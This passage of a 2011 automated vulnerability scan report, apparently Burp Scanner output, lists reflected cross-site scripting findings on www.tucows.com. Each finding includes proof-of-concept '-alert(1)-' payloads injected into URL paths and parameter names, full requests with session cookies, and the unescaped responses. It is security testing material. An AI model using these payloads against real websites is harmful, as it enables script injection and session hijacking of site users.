Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329b8"-alert(1)-"ca5ec70f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d20f"-alert(1)-"fab829ca50f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b37a5"-alert(1)-"3c4c9d14a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3ab"-alert(1)-"412e4b918b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16ea9"-alert(1)-"fa1a0931a13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5393"-alert(1)-"cb3cdfe4732 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa0e"-alert(1)-"a1b4df2075b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf37"-alert(1)-"829dd6d7186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f522"-alert(1)-"246c1c75e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c15"-alert(1)-"6e3e5a56f01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1045a"-alert(1)-"0b7ffb9ae62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.315. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/javascript:void(null)
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e7b"-alert(1)-"e4c6b9e0aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
